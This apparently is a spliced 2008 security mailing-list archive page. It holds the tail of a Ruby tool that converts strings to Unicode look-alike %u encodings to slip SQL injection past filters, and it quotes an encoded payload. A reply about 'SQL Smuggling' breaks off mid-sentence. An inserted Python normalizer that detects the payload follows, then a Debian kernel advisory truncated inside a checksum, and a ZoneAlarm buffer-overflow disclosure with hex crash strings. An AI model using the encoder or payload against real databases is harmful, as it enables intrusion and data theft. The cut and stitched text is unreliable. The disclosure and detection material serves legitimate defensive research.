  # Each ASCII character maps to the %uXXXX form of a look-alike code point
  # (mostly the fullwidth forms in the U+FF00 block).
  lookuptable = {
    ' ' => '%u0020',
    '/' => '%u2215',
    '\\' => '%u2215',
    "'" => '%u02b9',
    '"' => '%u0022',
    '>' => '%u003e',
    '<' => '%u003c',
    '#' => '%uff03',
    '!' => '%uff01',
    '$' => '%uff04',
    '*' => '%uff0a',
    '@' => '%u0040',
    '.' => '%uff0e',
    '_' => '%uff3f',
    '(' => '%uff08',
    ')' => '%uff09',
    ',' => '%uff0c',
    '%' => '%u0025',
    '-' => '%uff0d',
    ';' => '%uff1b',
    ':' => '%uff1a',
    '|' => '%uff5c',
    '&' => '%uff06',
    '+' => '%uff0b',
    '=' => '%uff1d',
    'a' => '%uff41',
    'A' => '%uff21',
    'b' => '%uff42',
    'B' => '%uff22',
    'c' => '%uff43',
    'C' => '%uff23',
    'd' => '%uff44',
    'D' => '%uff24',
    'e' => '%uff45',
    'E' => '%uff25',
    'f' => '%uff46',
    'F' => '%uff26',
    'g' => '%uff47',
    'G' => '%uff27',
    'h' => '%uff48',
    'H' => '%uff28',
    'i' => '%uff49',
    'I' => '%uff29',
    'j' => '%uff4a',
    'J' => '%uff2a',
    'k' => '%uff4b',
    'K' => '%uff2b',
    'l' => '%uff4c',
    'L' => '%uff2c',
    'm' => '%uff4d',
    'M' => '%uff2d',
    'n' => '%uff4e',
    'N' => '%uff2e',
    'o' => '%uff4f',
    'O' => '%uff2f',
    'p' => '%uff50',
    'P' => '%uff30',
    'q' => '%uff51',
    'Q' => '%uff31',
    'r' => '%uff52',
    'R' => '%uff32',
    's' => '%uff53',
    'S' => '%uff33',
    't' => '%uff54',
    'T' => '%uff34',
    'u' => '%uff55',
    'U' => '%uff35',
    'v' => '%uff56',
    'V' => '%uff36',
    'w' => '%uff57',
    'W' => '%uff37',
    'x' => '%uff58',
    'X' => '%uff38',
    'y' => '%uff59',
    'Y' => '%uff39',
    'z' => '%uff5a',
    'Z' => '%uff3a',
    '0' => '%uff10',
    '1' => '%uff11',
    '2' => '%uff12',
    '3' => '%uff13',
    '4' => '%uff14',
    '5' => '%uff15',
    '6' => '%uff16',
    '7' => '%uff17',
    '8' => '%uff18',
    '9' => '%uff19'
  }

  # Characters not in the table are percent-encoded the ordinary way.
  # URI.escape was removed in Ruby 3, so the RFC 2396 parser's escape is used.
  escaper = URI::RFC2396_Parser.new
  newstr = String.new
  # Convert string to array of chars
  string.scan(/./).each do |c|
    if lookuptable.has_key? c
      newstr << lookuptable[c]
    else
      newstr << escaper.escape(c)
    end
  end

  newstr
end

if __FILE__ == $PROGRAM_NAME
  print "Enter string to URL Unicode:"
  puts unicode_url(gets.chomp)
end

From: Tim [EMAIL PROTECTED]
Sent: 10 September 2008 00:34
To: [EMAIL PROTECTED]
Cc: bugtraq@securityfocus.com
Subject: Re: SQL Smuggling

 We released a research paper a few months ago, regarding a sub-class
 of SQL Injection that has not received attention till now. The crux is
 that when it comes to SQLi, protection and detection do not typically
 take the architecture into account; this can allow smuggling attacks
 which are not blocked or discovered.

 The paper can be found at:
 http://www.ComsecGlobal.com/framework/Upload/SQL_Smuggling.pdf

 From the paper:
 This paper will present a new class of attack, called SQL Smuggling.
 ...


I don't see how this is a new class of attack.  You've merely outlined
some techniques to bypass broken data validation routines.  In SQL
injection, as with any injection vulnerability, the correct way to fix
it is to rely on the syntax of the language to encode data which may be
interpreted 
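A defender-side counterpart to the encoding script in Gary's mail, added here as a Python example (it is not Gary's code and not from Sec-1 or Comsec): decode the IIS-style `%uXXXX` form, fold the fullwidth look-alikes back to ASCII with NFKC, apply the two substitutions the table above relies on that NFKC does not cover (U+02B9 for the apostrophe, U+2215 for the slash), and only then run a signature. The signature and the best-fit map are constructed for this illustration; a real best-fit list for a given database would be longer.

```python
import re
import unicodedata

# IIS-style %uXXXX escapes (what the Ruby script emits) plus ordinary %XX.
# %XX is decoded byte-wise here, which is enough for ASCII input.
_ESCAPE = re.compile(r"%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})")


def decode_iis_unicode(raw):
    return _ESCAPE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), raw)


# Code points with no NFKC mapping to ASCII that the table above nevertheless
# treats as interchangeable with ' and / once the database narrows them to a
# single-byte character set. Constructed from that table (assumption).
BEST_FIT = {"\u02b9": "'", "\u2215": "/"}


def canonicalize(s):
    """Fold fullwidth forms to ASCII (NFKC), then apply the best-fit map."""
    folded = unicodedata.normalize("NFKC", s)
    return "".join(BEST_FIT.get(ch, ch) for ch in folded)


# Toy blocklist signature for the payload quoted on the page: ' or 1 in (@@version)--
SIGNATURE = re.compile(r"'\s*or\s+\d+\s*(?:in|=)", re.IGNORECASE)


def naive_filter_blocks(raw):
    """What a filter that decodes the request but never normalizes it sees."""
    return SIGNATURE.search(decode_iis_unicode(raw)) is not None


def normalized_filter_blocks(raw):
    """The same signature applied after canonicalization."""
    return SIGNATURE.search(canonicalize(decode_iis_unicode(raw))) is not None


# The encoded payload from the comment header of the Ruby script.
SMUGGLED = ("%u02b9%u0020%uff4f%uff52%u0020%uff11%u0020%uff49%uff4e%u0020"
            "%uff08%u0040%u0040%uff56%uff45%uff52%uff53%uff49%uff4f%uff4e"
            "%uff09%uff0d%uff0d")

if __name__ == "__main__":
    print("decoded      :", decode_iis_unicode(SMUGGLED))
    print("canonical    :", canonicalize(decode_iis_unicode(SMUGGLED)))
    print("naive blocks :", naive_filter_blocks(SMUGGLED))
    print("normalized   :", normalized_filter_blocks(SMUGGLED))
```

The point of the two filter functions is the ordering: a filter that inspects the request before the same canonicalization the database will effectively perform is matching a different string than the one the query engine executes, which is the whole reason the table in the Ruby script works against it.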

[SECURITY] [DSA 1636-1] New Linux 2.6.24 packages fix several vulnerabilities

2008-09-11 Thread dann frazier
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- --
Debian Security Advisory DSA-1636-1[EMAIL PROTECTED]
http://www.debian.org/security/   dann frazier
Sep 11, 2008http://www.debian.org/security/faq
- --

Package: linux-2.6.24
Vulnerability  : denial of service/information leak
Problem type   : local/remote
Debian-specific: no
CVE Id(s)  : CVE-2008-3272 CVE-2008-3275 CVE-2008-3276 CVE-2008-3526
 CVE-2008-3534 CVE-2008-3535 CVE-2008-3792 CVE-2008-3915

Several vulnerabilities have been discovered in the Linux kernel that may
lead to a denial of service or leak sensitive data. The Common Vulnerabilities
and Exposures project identifies the following problems:

CVE-2008-3272

Tobias Klein reported a locally exploitable data leak in the
snd_seq_oss_synth_make_info() function. This may allow local users
to gain access to sensitive information.

CVE-2008-3275

Zoltan Sogor discovered a coding error in the VFS that allows local users
to exploit a kernel memory leak resulting in a denial of service.

CVE-2008-3276

Eugene Teo reported an integer overflow in the DCCP subsystem that
may allow remote attackers to cause a denial of service in the form
of a kernel panic.

CVE-2008-3526

Eugene Teo reported a missing bounds check in the SCTP subsystem.
By exploiting an integer overflow in the SCTP_AUTH_KEY handling code,
remote attackers may be able to cause a denial of service in the form
of a kernel panic.

CVE-2008-3534

Kel Modderman reported an issue in the tmpfs filesystem that allows
local users to crash a system by triggering a kernel BUG() assertion.

CVE-2008-3535

Alexey Dobriyan discovered an off-by-one error in the iov_iter_advance
function which can be exploited by local users to crash a system,
resulting in a denial of service.

CVE-2008-3792

Vlad Yasevich reported several NULL pointer reference conditions in
the SCTP subsystem that can be triggered by entering sctp-auth codepaths
when the AUTH feature is inactive. This may allow attackers to cause
a denial of service condition via a system panic.

CVE-2008-3915

Johann Dahm and David Richter reported an issue in the nfsd subsystem
that may allow remote attackers to cause a denial of service via a
buffer overflow.

For the stable distribution (etch), these problems have been fixed in
version 2.6.24-6~etchnhalf.5.

We recommend that you upgrade your linux-2.6.24 packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.5.dsc
    Size/MD5 checksum:     5107 77e0185b5d5efa18885eae513acffa6a
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24-6~etchnhalf.5.diff.gz
    Size/MD5 checksum:  3932827 40cb2fb2852c48b6da11ef1e0c59a8fa
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-2.6.24_2.6.24.orig.tar.gz
    Size/MD5 checksum: 59630522 6b8751d1eb8e71498ba74bbd346343af

Architecture independent packages:

  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-tree-2.6.24_2.6.24-6~etchnhalf.5_all.deb
    Size/MD5 checksum:    81100 0382c2c77051367e8efd9d3d933f85ef
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-doc-2.6.24_2.6.24-6~etchnhalf.5_all.deb
    Size/MD5 checksum:  4259616 a87291ee36a46fc9c5c040f83afa7f9f
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-source-2.6.24_2.6.24-6~etchnhalf.5_all.deb
    Size/MD5 checksum: 46858178 d62d102e8478bb14caa6d0303c68ff6b
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-patch-debian-2.6.24_2.6.24-6~etchnhalf.5_all.deb
    Size/MD5 checksum:   749438 9312478438ae81439074ceec72d3a349
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-manual-2.6.24_2.6.24-6~etchnhalf.5_all.deb
    Size/MD5 checksum:  1548872 1a56b95a09b2caf8e6347578755d5ba6
  http://security.debian.org/pool/updates/main/l/linux-2.6.24/linux-support-2.6.24-etchnhalf.1_2.6.24-6~etchnhalf.5_all.deb
    Size/MD5 checksum:    95464 9950e248bbe489b6fb60e3e9af1c

alpha architecture (DEC Alpha)

  

ZoneAlarm Security Suite buffer overflow

2008-09-11 Thread jplopezy

Application: ZoneAlarm Security Suite
OS: Windows XP (all patches up to date)
--
1 - Description
2 - Vulnerability
3 - POC/EXPLOIT
--
Description

ZoneAlarm is a well-known firewall; the Security Suite version adds
some tools such as an antivirus, antispam and so on.


Details of the version

ZoneAlarm Security Suite version: 7.0.483.000
TrueVector version: 7.0.483.000
Driver version: 7.0.483.000
Anti-virus engine version: 3
Antivirus engine version: 5.0.1.85
Anti-virus signature DAT file version: 915051681
Anti-spyware engine version: 5.0.189.0
Anti-spyware signature DAT file version: 01.200801.3195
AntiSpam version: 5.0.6.8903


--
Vulnerability

The vulnerability is caused by the program failing to handle very long paths.
This causes a buffer overflow with the possibility of code execution.

The flaw could be exploited by malware to leave the system without
protection, for instance.

--
POC/EXPLOIT


Here you can view a video proof of concept

http://www.fileden.com/files/2008/9/11/2091525/zonealarm.swf


Strings


ASCII: · …  AAA · …  AAA · …  
AAA · · …  AAA · …  AAA · …  
AAA · · …  A · …  AAA · …  AAA

HEX : b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 
b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 
20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 
b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 
20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 20 b7 20 
b7 20 85 20 20 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 20 b7 20 85 20 20 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41


ASCII: ………
AAAAA

HEX: 85 85 85 85 85 85 85 85 85 85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 85 85 
85 85 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 
41 41 41 41 41 41 41 41 41 41 41




--
Juan Pablo Lopez Yacubian